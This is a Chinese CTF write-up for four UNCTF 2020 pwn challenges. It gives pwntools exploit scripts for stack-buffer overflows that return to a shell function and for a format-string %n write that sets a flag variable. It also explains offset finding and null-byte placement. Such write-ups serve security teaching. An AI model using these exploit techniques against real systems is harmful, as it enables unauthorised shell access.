[UNCTF 2020] PWN方向

YLBNB

在这里插入图片描述
直接在linux使用指令nc 45.158.33.12 8000
在这里插入图片描述

1
2
3
4
5
6
7
from pwn import *

io = remote('45.158.33.12',8000)

payload = 'chcp 65001'
io.sendline(payload)
print(io.recv())

运行脚本得到flag
在这里插入图片描述

fan

在这里插入图片描述
明显的栈溢出
在这里插入图片描述
binsh+system地址

1
2
3
4
5
6
7
8
9
10
11
12
#coding=utf-8
#!/usr/bin/env python
from pwn import *

io = remote('node2.hackingfor.fun',49408)

binsh = 0x400739
payload = 'A' * (0x30 + 8) + p64(binsh)
print(payload)
io.sendline(payload)

io.interactive()

在这里插入图片描述

do_you_like_me?

在这里插入图片描述
同上题,明显的栈溢出
在这里插入图片描述
binsh+system地址

1
2
3
4
5
6
7
8
9
10
11
12
#coding=utf-8
#!/usr/bin/env python
from pwn import *

io = remote('node2.hackingfor.fun',41043)

binsh = 0x4006D1 
payload = 'A' * (0x10 + 8) + p64(binsh)
print(payload)
io.sendline(payload)

io.interactive()

在这里插入图片描述

你真的会pwn嘛?(*格式化字符串漏洞)

0x00 逆向分析

在这里插入图片描述
在这里插入图片描述
只要dword_60107c不为0即可得到shell
运用格式化字符串漏洞%n即可修改dword_60107c

0x01 获取偏移量

在这里插入图片描述
可以看到输入的8个A在第十个变量,所以偏移量为10。

0x02 脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
#coding=utf-8
#!/usr/bin/env python
from pwn import *
from LibcSearcher import *

io = remote('node2.hackingfor.fun',46560)
elf = ELF('./pwn22')

dword_60107C = 0x60107C
payload = '...%11$n' + p64(dword_60107C)
print(payload)
io.sendline(payload)
#偏移量10
io.interactive()

在这里插入图片描述
这个payload有三个注意点:
1.printf有\x00截断,即碰到\x00就会停止读入,所以如果把dword的地址放在%11$n之前,由于地址中存在\x00字符,所以会导致读取时碰到\x00而读不到%11$n就结束了。因此要把%11$n放在前面

  1. %11$n只会把它之前输出的字符数量写到指定地址里,之后的不行。payload中的...%11$n 改为%11$n... 则写进去的是0,因为在它之前没有输出字符。上图中虽然输出了...|\x10但是真正写进去的只有...,也就是3。
  2. 为了让printf认为dword的地址是要写进去的地址,一定要让它的地址刚好占一个机器字长。所以在这之前的 %11$n一定要用...补齐8个字符(当然不用.用别的字符也是可以的)